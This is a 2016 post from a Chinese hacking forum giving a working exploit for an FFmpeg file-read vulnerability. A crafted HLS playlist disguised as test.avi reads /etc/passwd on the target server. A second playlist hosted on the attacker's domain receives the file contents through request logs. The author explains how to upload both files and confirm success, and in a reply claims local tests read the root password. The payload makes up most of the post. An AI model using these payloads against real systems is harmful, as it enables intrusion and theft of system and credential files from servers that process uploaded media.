查看: 14905|回复: 2

FFmpeg文件读取漏洞测试及利用

[复制链接]
发表于 2016-6-20 21:56:05 | 显示全部楼层 |阅读模式
本帖最后由 人=族 于 2016-6-20 21:57 编辑

看了老外写的文章,大概理解的利用方式如下:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.nxadmin.com/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST
以上内容保存成test.avi,是用来上传到被攻击服务器的。

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://www.nxadmin.com?
以上内容保存成header.m3u8,将header.m3u8上传到你的服务器,然后把test.avi上传到攻击服务器,如果有漏洞,会收到如下的日志:









会收到三条日志记录,第一条是请求header.m3u8文件的,第三条中就包含了读取的部分文件内容,说明是存在此漏洞的。

header.m3u8文件的内容大概是将让你的web产生日志并且传回读取的文件内容。

经历过ImageMagick命令执行漏洞的洗礼之后,又有FFmpeg文件读取漏洞
                  
回复

使用道具 举报

发表于 2016-6-21 13:16:39 | 显示全部楼层
普通权限也阔以?
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-6-22 09:57:24 | 显示全部楼层
本地测试的可以读取 、root密码
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 04:04 , Processed in 0.025736 second(s), 11 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部